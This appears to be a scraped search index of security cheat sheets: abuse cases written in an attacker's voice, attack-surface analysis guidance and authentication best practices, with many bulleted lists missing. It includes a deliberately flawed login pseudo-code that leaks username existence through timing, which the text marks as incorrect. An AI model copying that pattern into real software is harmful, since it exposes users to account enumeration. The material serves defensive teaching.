As an attacker, I include malicious XML code to exploit vulnerable code, dependencies or integrations to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack (e.g. Billion Laughs attack), as well as execute other attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a52017-broken-access-control","title":"A5:2017-Broken Access Control","text":"

Epic:

Exploitation of access control is a core skill of attackers. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.

Abuse Case:

As an attacker, I bypass access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool.

Abuse Case:

As an attacker, I manipulate the primary key and change it to access another user's record, allowing viewing or editing of someone else's account.

Abuse Case:

As an attacker, I manipulate sessions, access tokens, or other access controls in the application to act as a user without being logged in, or to act as an admin/privileged user when logged in as a regular user.

Abuse Case:

As an attacker, I leverage metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token, manipulating a cookie or hidden field to elevate privileges, or abusing JWT invalidation.

Abuse Case:

As an attacker, I exploit a Cross-Origin Resource Sharing (CORS) misconfiguration that allows unauthorized API access.

Abuse Case:

As an attacker, I force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

Abuse Case:

As an attacker, I access APIs with missing access controls for POST, PUT and DELETE.

Abuse Case:

As an attacker, I target default crypto keys in use, weak crypto keys generated or re-used, or keys for which rotation is missing.

Abuse Case:

As an attacker, I find areas where the user agent (e.g. app, mail client) does not verify if the received server certificate is valid and perform attacks where I get unauthorized access to data.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a62017-security-misconfiguration","title":"A6:2017-Security Misconfiguration","text":"

Epic:

Attackers will often attempt to exploit unpatched flaws or access default accounts, unused pages, unprotected files and directories, etc., to gain unauthorized access to, or knowledge of, the system.

Abuse Case:

As an attacker, I find and exploit missing security hardening configurations on any part of the application stack, or improperly configured permissions on cloud services.

Abuse Case:

As an attacker, I find unnecessary features which are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges) and attack or exploit the weakness.

Abuse Case:

As an attacker, I use default accounts and their passwords to access systems and interfaces, or to perform actions on components, which I should not be able to do.

Abuse Case:

As an attacker, I find areas of the application where error handling reveals stack traces or other overly informative error messages I can use for further exploitation.

Abuse Case:

As an attacker, I find areas where systems are not upgraded, or where the latest security features are disabled or not configured securely.

Abuse Case:

As an attacker, I find security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values.

Abuse Case:

As an attacker, I find the server does not send security headers or directives or they are not set to secure values.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a72017-cross-site-scripting-xss","title":"A7:2017-Cross-Site Scripting (XSS)","text":"

Epic:

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Abuse Case:

As an attacker, I perform reflected XSS where the application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack allows me to execute arbitrary HTML and JavaScript in my victim's browser. Typically the victim will need to interact with a malicious link that points to an attacker-controlled page, such as a malicious watering hole website, advertisement, or similar.

Abuse Case:

As an attacker, I perform stored XSS where the application or API stores unsanitized user input that is viewed at a later time by another user or an administrator.

Abuse Case:

As an attacker, I perform DOM-based XSS against JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in a page.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a82017-insecure-deserialization","title":"A8:2017-Insecure Deserialization","text":"

Epic:

Exploitation of deserialization is somewhat difficult, as off-the-shelf exploits rarely work without changes or tweaks to the underlying exploit code.

Abuse Case:

As an attacker, I find areas of the application and APIs where deserialization of hostile or tampered objects can be supplied. As a result, I can focus on object- and data-structure-related attacks, in which I modify application logic or achieve arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization. Alternatively, I focus on data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a92017-using-components-with-known-vulnerabilities","title":"A9:2017-Using Components with Known Vulnerabilities","text":"

Epic:

While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.

Abuse Case:

As an attacker, I find common open source or closed source packages with weaknesses and perform attacks against the vulnerabilities and exploits that have been disclosed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a102017-insufficient-logging-monitoring","title":"A10:2017-Insufficient Logging & Monitoring","text":"

Epic:

Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. In 2016, identifying a breach took an average of 191 days, leaving plenty of time for damage to be inflicted.

Abuse Case:

As an attacker, I attack an organization and the logs, monitoring systems, and teams do not see or respond to my attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#sources-of-the-schemas","title":"Sources of the schemas","text":"

All figures were created using the https://www.draw.io/ site and exported (as PNG images) for integration into this article.

All XML descriptor files for each schema are available below (using the XML descriptor, the schema can be modified on the DRAW.IO site):

Schemas descriptors archive

"},{"location":"cheatsheets/Access_Control_Cheat_Sheet.html","title":"DEPRECATED: Access Control Cheatsheet","text":"

The Access Control cheat sheet has been deprecated.

Please visit the Authorization Cheatsheet instead.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html","title":"Attack Surface Analysis Cheat Sheet","text":""},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#what-is-attack-surface-analysis-and-why-is-it-important","title":"What is Attack Surface Analysis and Why is it Important","text":"

This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different from the external attack surface, and some users may have a lot of access.

Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.

Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.

Attack Surface Analysis helps you to:

  1. identify what functions and what parts of the system you need to review/test for security vulnerabilities
  2. identify high risk areas of code that require defense-in-depth protection - what parts of the system you need to defend
  3. identify when you have changed the attack surface and need to do some kind of threat assessment
"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#defining-the-attack-surface-of-an-application","title":"Defining the Attack Surface of an Application","text":"

The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.

The Attack Surface of an application is:

  1. the sum of all paths for data/commands into and out of the application, and
  2. the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding)
  3. all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and
  4. the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).

You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators).

Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.

With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general types of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.
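
A minimal sketch of this counting exercise (the routes and bucket names are invented for illustration; in practice the inventory would come from your router, gateway configuration, or a crawl):

from collections import Counter

# Illustrative inventory of attack points: (path, bucket) pairs.
attack_points = [
    ("/login", "authentication"),
    ("/search", "public web form"),
    ("/admin/users", "admin interface"),
    ("/api/v1/orders", "internal API"),
    ("/api/v1/orders/{id}", "internal API"),
    ("/upload", "file upload"),
]

counts = Counter(bucket for _, bucket in attack_points)
for bucket, count in counts.most_common():
    print(f"{bucket}: {count} attack point(s)")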

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#microservice-and-cloud-native-applications","title":"Microservice and Cloud Native Applications","text":"

Microservice and Cloud Native applications are composed of multiple smaller components, loosely coupled using APIs and independently scalable. When assessing the attack surface for applications of this architectural style, you should prioritize the components that are reachable from an attack source (e.g. external traffic from the Internet). Such components may be located behind tiers of proxies, load balancers and ingress controllers, and may auto-scale without warning.

Open source tooling such as Scope or ThreatMapper can assist in visualizing the attack surface.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#identifying-and-mapping-the-attack-surface","title":"Identifying and Mapping the Attack Surface","text":"

You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:

The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:

You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code.

You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like OWASP ZAP, Arachni, Skipfish, w3af, or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the application's entry points.

Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and Application Threat Modeling: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.

The Attack Surface model may be rough and incomplete to start, especially if you haven't done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#measuring-and-assessing-the-attack-surface","title":"Measuring and Assessing the Attack Surface","text":"

Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points (interfaces with outside systems and to the Internet) and especially where the system allows anonymous, public access.

These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.

Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application and tracking changes to the Attack Surface over time, called the Relative Attack Surface Quotient (RSQ). Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an Attack Surface Metric for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC endpoints, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.
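
As a toy illustration of the damage-potential/effort idea (the elements and weights below are invented, not taken from the cited research), the score is simply a weighted sum that can be recomputed after each change:

# Toy Attack Surface Metric: sum of (damage potential / attacker effort)
# over entry/exit points, channels, and untrusted data items.
elements = [
    # (name,                     damage_potential, attacker_effort)
    ("anonymous HTTP endpoint",  9, 2),
    ("authenticated API",        6, 4),
    ("admin RPC channel",        10, 6),
    ("uploaded file contents",   8, 3),
]

score = sum(damage / effort for _, damage, effort in elements)
print(f"Attack surface score: {score:.2f}")
# Re-run the calculation after each release to see how the score trends.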

Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configuration practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.

Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad actors by not protecting your backups.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#managing-the-attack-surface","title":"Managing the Attack Surface","text":"

Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:

The first web page that you create opens up the system's Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven't increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.

If you add another web page that follows the same design and uses the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or a file that can be uploaded from the Internet, each of these changes has a different risk profile again - see if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place.

Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. The same applies to changes to the code that handles encryption and secrets, to fundamental changes in how data validation is done, and to major architectural changes to layering and trust relationships, or fundamental changes in technical architecture, such as swapping out your web server or database platform, or changing the runtime operating system.

As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is denied by default) or negative (access is allowed by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model, you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to access.

This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.

Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can: by simplifying the model (for example, reducing the number of user levels or not storing confidential data that you don't absolutely need), by turning off features and interfaces that aren't being used, and by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html","title":"Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authentication is the process of verifying that an individual, entity or website is who it claims to be. Authentication in the context of web applications is commonly performed by submitting a username or ID and one or more items of private information that only a given user should know.

Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forth between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict. The Session Management Cheat Sheet contains further guidance on the best practices in this area.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-general-guidelines","title":"Authentication General Guidelines","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#user-ids","title":"User IDs","text":"

Make sure your usernames/user IDs are case-insensitive. User 'smith' and user 'Smith' should be the same user. Usernames should also be unique. For high-security applications, usernames could be assigned and secret instead of user-defined public data.
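
A minimal sketch of such normalization, assuming Unicode casefolding is an acceptable canonical form for your user base:

def canonicalize_username(username: str) -> str:
    """Normalize a username so 'Smith' and 'smith' map to the same account."""
    return username.strip().casefold()

# Store canonicalize_username(name) at registration time and apply the same
# function to the submitted name at login, so lookups are case-insensitive.
assert canonicalize_username("Smith") == canonicalize_username("  smith ")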

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#email-address-as-a-user-id","title":"Email address as a User ID","text":"

For information on validating email addresses, please visit the input validation cheatsheet email discussion.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-solution-and-sensitive-accounts","title":"Authentication Solution and Sensitive Accounts","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls","title":"Implement Proper Password Strength Controls","text":"

A key concern when using passwords for authentication is password strength. A \"strong\" password policy makes it difficult or even improbable for one to guess the password through either manual or automated means. The following characteristics define a strong password:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#for-more-detailed-information-check","title":"For more detailed information check","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-secure-password-recovery-mechanism","title":"Implement Secure Password Recovery Mechanism","text":"

It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Please see Forgot Password Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#store-passwords-in-a-secure-fashion","title":"Store Passwords in a Secure Fashion","text":"

It is critical for an application to store a password using the right cryptographic technique. Please see Password Storage Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#compare-password-hashes-using-safe-functions","title":"Compare Password Hashes Using Safe Functions","text":"

Where possible, the user-supplied password should be compared to the stored password hash using a secure password comparison function provided by the language or framework, such as the password_verify() function in PHP. Where this is not possible, ensure that the comparison function:
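
Where no such framework function is available, a constant-time comparison can be assembled from standard primitives. The sketch below uses Python's hashlib.scrypt and hmac.compare_digest purely as an illustration; work factors should follow current password storage guidance:

import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a password hash (tune work factors per current guidance)."""
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)

def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Recompute the hash and compare in constant time."""
    return hmac.compare_digest(hash_password(password, salt), stored_digest)

salt = os.urandom(16)                      # unique random salt per user
digest = hash_password("correct horse battery staple", salt)
assert verify_password("correct horse battery staple", salt, digest)
assert not verify_password("guess", salt, digest)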

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#change-password-feature","title":"Change Password Feature","text":"

When developing a change password feature, ensure that it has:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#transmit-passwords-only-over-tls-or-other-strong-transport","title":"Transmit Passwords Only Over TLS or Other Strong Transport","text":"

See: Transport Layer Protection Cheat Sheet

The login page and all subsequent authenticated pages must be exclusively accessed over TLS or other strong transport. Failure to utilize TLS or other strong transport for the login page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS or other strong transport for authenticated pages after login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#require-re-authentication-for-sensitive-features","title":"Require Re-authentication for Sensitive Features","text":"

In order to mitigate CSRF and session hijacking, it's important to require the current credentials for an account before updating sensitive account information such as the user's password, user's email, or before sensitive transactions, such as shipping a purchase to a new address. Without this countermeasure, an attacker may be able to execute sensitive transactions through a CSRF or XSS attack without needing to know the user's current credentials. Additionally, an attacker may get temporary physical access to a user's browser or steal their session ID to take over the user's session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#consider-strong-transaction-authentication","title":"Consider Strong Transaction Authentication","text":"

Some applications should use a second factor to check whether a user may perform sensitive operations. For more information, see the Transaction Authorization Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#tls-client-authentication","title":"TLS Client Authentication","text":"

TLS Client Authentication, also known as two-way TLS authentication, consists of both browser and server sending their respective TLS certificates during the TLS handshake process. Just as you can validate the authenticity of a server by using the certificate and asking a well known Certificate Authority (CA) if the certificate is valid, the server can authenticate the user by receiving a certificate from the client and validating it against a third party CA or its own CA. To do this, the server must provide the user with a certificate generated specifically for them, assigning values to the subject so that these can be used to determine what user the certificate should validate. The user installs the certificate in a browser and now uses it for the website.

It is a good idea to do this when:

It is generally not a good idea to use this method for widely and publicly available websites that will have an average user. For example, it wouldn't be a good idea to implement this for a website like Facebook. While this technique can prevent the user from having to type a password (thus protecting against an average keylogger stealing it), it is still a good idea to consider using both a password and TLS client authentication combined.

Additionally, if the client is behind an enterprise proxy which performs SSL/TLS decryption, this will break certificate authentication unless the site is allowed on the proxy.

For more information, see: Client-authenticated TLS handshake

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","title":"Authentication and Error Messages","text":"

Incorrectly implemented error messages in the case of authentication functionality can be used for the purposes of user ID and password enumeration. An application should respond (both HTTP and HTML) in a generic manner.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-responses","title":"Authentication Responses","text":"

Using any of the authentication mechanisms (login, password reset or password recovery), an application must respond with a generic error message regardless of whether:

The account registration feature should also be taken into consideration, and the same generic error message approach can be applied to the case in which the user already exists.

The objective is to prevent the creation of a discrepancy factor, allowing an attacker to mount a user enumeration action against the application.

It is interesting to note that the business logic itself can introduce a discrepancy factor related to the processing time taken. Indeed, depending on the implementation, the processing time can be significantly different according to the case (success vs failure), allowing an attacker to mount a time-based attack (a delta of some seconds, for example).

Example using pseudo-code for a login feature:

IF USER_EXISTS(username) THEN
    password_hash=HASH(password)
    IS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)
    IF NOT IS_VALID THEN
        RETURN Error("Invalid Username or Password!")
    ENDIF
ELSE
    RETURN Error("Invalid Username or Password!")
ENDIF

It can clearly be seen that if the user doesn't exist, the application will directly throw an error. Otherwise, when the user exists but the password doesn't match, more processing occurs before the application errors out. As a result, the response time will differ for the same error, allowing the attacker to differentiate between a wrong username and a wrong password.

password_hash=HASH(password)
IS_VALID=LOOKUP_CREDENTIALS_IN_STORE(username, password_hash)
IF NOT IS_VALID THEN
    RETURN Error("Invalid Username or Password!")
ENDIF

This code will go through the same process no matter what the user or the password is, allowing the application to return in approximately the same response time.

The problem with returning a generic error message for the user is a User Experience (UX) matter. A legitimate user might feel confused by the generic messages, making it hard for them to use the application, and might, after several retries, leave the application because of its complexity. The decision to return a generic error message can be determined based on the criticality of the application and its data. For example, for critical applications, the team can decide that under the failure scenario, a user will always be redirected to the support page and a generic error message will be returned.

Regarding the user enumeration itself, protection against brute-force attacks is also effective because it prevents an attacker from applying the enumeration at scale. Usage of CAPTCHA can be applied on a feature for which a generic error message cannot be returned because the user experience must be preserved.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#incorrect-and-correct-response-examples","title":"Incorrect and correct response examples","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login","title":"Login","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#password-recovery","title":"Password recovery","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-creation","title":"Account creation","text":"

Incorrect response examples:

Correct response example:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#error-codes-and-urls","title":"Error Codes and URLs","text":"

The application may return a different HTTP error code depending on the authentication attempt response. It may respond with a 200 for a positive result and a 403 for a negative result. Even though a generic error page is shown to a user, the HTTP response code may differ, which can leak information about whether the account is valid or not.
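
To illustrate, a minimal Flask-style handler (the route and helper names are invented) returns the identical status code and body for both failure causes, and evaluates the credential check in every case:

from flask import Flask, request

app = Flask(__name__)

def password_matches(username: str, password: str) -> bool:
    # Placeholder for a real constant-time hash comparison against the store.
    return False

@app.post("/login")
def login():
    username = request.form.get("username", "")
    password = request.form.get("password", "")
    valid = password_matches(username, password)  # evaluated for every request
    if valid:
        return {"message": "Welcome"}, 200
    # Unknown user and wrong password produce the same status code and body,
    # so neither the page nor the HTTP code reveals whether the account exists.
    return {"message": "Invalid Username or Password!"}, 401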

Error disclosure can also be used as a discrepancy factor; consult the Error Handling Cheat Sheet regarding the global handling of different errors in an application.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#protect-against-automated-attacks","title":"Protect Against Automated Attacks","text":"

There are a number of different types of automated attacks that attackers can use to try and compromise user accounts. The most common types are listed below:

Attack Type | Description
Brute Force | Testing multiple passwords from a dictionary or other source against a single account.
Credential Stuffing | Testing username/password pairs obtained from the breach of another site.
Password Spraying | Testing a single weak password against a large number of different accounts.

Different protection mechanisms can be implemented to protect against these attacks. In many cases, these defences do not provide complete protection, but when a number of them are implemented in a defence-in-depth approach, a reasonable level of protection can be achieved.

The following sections will focus primarily on preventing brute-force attacks, although these controls can also be effective against other types of attacks. For further guidance on defending against credential stuffing and password spraying, see the Credential Stuffing Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#multi-factor-authentication","title":"Multi-Factor Authentication","text":"

Multi-factor authentication (MFA) is by far the best defence against the majority of password-related attacks, including brute-force attacks, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

The Multifactor Authentication Cheat Sheet contains further guidance on implementing MFA.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#login-throttling","title":"Login Throttling","text":"

Login Throttling is a protocol used to prevent an attacker from making too many attempts at guessing a password through normal interactive means. It includes:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

The most common protection against these attacks is to implement account lockout, which prevents any more login attempts for a period after a certain number of failed logins.

The counter of failed logins should be associated with the account itself, rather than the source IP address, in order to prevent an attacker from making login attempts from a large number of different IP addresses. There are a number of different factors that should be considered when implementing an account lockout policy in order to find a balance between security and usability:

Rather than implementing a fixed lockout duration (e.g., ten minutes), some applications use an exponential lockout, where the lockout duration starts as a very short period (e.g., one second), but doubles after each failed login attempt.
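
A minimal sketch of that exponential scheme; the one-second base and fifteen-minute cap are illustrative choices:

def lockout_seconds(failed_attempts: int, base: float = 1.0, cap: float = 900.0) -> float:
    """Lockout duration that starts at about one second and doubles per failure, capped."""
    if failed_attempts <= 0:
        return 0.0
    return min(base * 2 ** (failed_attempts - 1), cap)

# 1 failure -> 1s, 2 -> 2s, 3 -> 4s, ... capped at 15 minutes.
print([lockout_seconds(n) for n in range(1, 8)])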

When designing an account lockout system, care must be taken to prevent it from being used to cause a denial of service by locking out other users' accounts. One way this could be performed is to allow the user of the forgotten password functionality to log in, even if the account is locked out.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#captcha","title":"CAPTCHA","text":"

The use of an effective CAPTCHA can help to prevent automated login attempts against accounts. However, many CAPTCHA implementations have weaknesses that allow them to be solved using automated techniques or can be outsourced to services which can solve them. As such, the use of CAPTCHA should be viewed as a defence-in-depth control to make brute-force attacks more time consuming and expensive, rather than as a preventative.

It may be more user-friendly to only require a CAPTCHA be solved after a small number of failed login attempts, rather than requiring it from the very first login.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#security-questions-and-memorable-words","title":"Security Questions and Memorable Words","text":"

The addition of a security question or memorable word can also help protect against automated attacks, especially when the user is asked to enter a number of randomly chosen characters from the word. It should be noted that this does not constitute multi-factor authentication, as both factors are the same (something you know). Furthermore, security questions are often weak and have predictable answers, so they must be carefully chosen. The Choosing and Using Security Questions cheat sheet contains further guidance on this.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#logging-and-monitoring","title":"Logging and Monitoring","text":"

Enable logging and monitoring of authentication functions to detect attacks/failures on a real-time basis.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#use-of-authentication-protocols-that-require-no-password","title":"Use of authentication protocols that require no password","text":"

While authentication through a user/password combination and using multi-factor authentication is considered generally secure, there are use cases where it isn't considered the best option or even safe. Examples of this are third-party applications that want to connect to the web application, whether from a mobile device, another website, a desktop application or other situations. When this happens, it is NOT considered safe to allow the third-party application to store the user/password combo, since it extends the attack surface into their hands, where it isn't under your control. For this, and other use cases, there are several authentication protocols that can protect you from exposing your users' data to attackers.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#oauth","title":"OAuth","text":"

Open Authorization (OAuth) is a protocol that allows an application to authenticate against a server as a user, without requiring passwords or any third party server that acts as an identity provider. It uses a token generated by the server and defines how the authorization flows occur, so that a client, such as a mobile application, can tell the server which user is using the service.

The recommendation is to use and implement OAuth 1.0a or OAuth 2.0, since the very first version (OAuth 1.0) has been found to be vulnerable to session fixation.

OAuth 2.0 relies on HTTPS for security and is currently used and implemented by APIs from companies such as Facebook, Google, Twitter and Microsoft. OAuth 1.0a is more difficult to use because it requires the use of cryptographic libraries for digital signatures. However, since OAuth 1.0a does not rely on HTTPS for security, it can be more suited for higher-risk transactions.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#openid","title":"OpenId","text":"

OpenId is an HTTP-based protocol that uses identity providers to validate that a user is who they say they are. It is a very simple protocol which allows service-provider-initiated single sign-on (SSO). This allows the user to re-use a single identity given to a trusted OpenId identity provider and be the same user on multiple websites, without the need to provide any website with the password, except for the OpenId identity provider.

Due to its simplicity and the protection it provides for passwords, OpenId has been well adopted. Some of the well-known identity providers for OpenId are Stack Exchange, Google, Facebook and Yahoo!

For non-enterprise environments, OpenId is considered a secure and often better choice, as long as the identity provider is trusted.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#saml","title":"SAML","text":"

Security Assertion Markup Language (SAML) is often considered to compete with OpenId. The most recommended version is 2.0 since it is very feature-complete and provides strong security. Like OpenId, SAML uses identity providers, but unlike OpenId, it is XML-based and provides more flexibility. SAML is based on browser redirects which send XML data. Furthermore, SAML isn't only initiated by a service provider; it can also be initiated from the identity provider. This allows the user to navigate through different portals while still being authenticated without having to do anything, making the process transparent.

While OpenId has taken most of the consumer market, SAML is often the choice for enterprise applications. The reason for this is often that there are few OpenId identity providers which are considered enterprise-class (meaning that the way they validate the user's identity doesn't meet the high standards required for enterprise identity). It is more common to see SAML being used inside of intranet websites, sometimes even using a server from the intranet as the identity provider.

In the past few years, applications like SAP ERP and SharePoint (SharePoint by using Active Directory Federation Services 2.0) have decided to use SAML 2.0 authentication as an often preferred method for single sign-on implementations whenever enterprise federation is required for web services and web applications.

See also: SAML Security Cheat Sheet

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#fido","title":"FIDO","text":"

The Fast Identity Online (FIDO) Alliance has created two protocols to facilitate online authentication: the Universal Authentication Framework (UAF) protocol and the Universal Second Factor (U2F) protocol. While UAF focuses on passwordless authentication, U2F allows the addition of a second factor to existing password-based authentication. Both protocols are based on a public key cryptography challenge-response model.

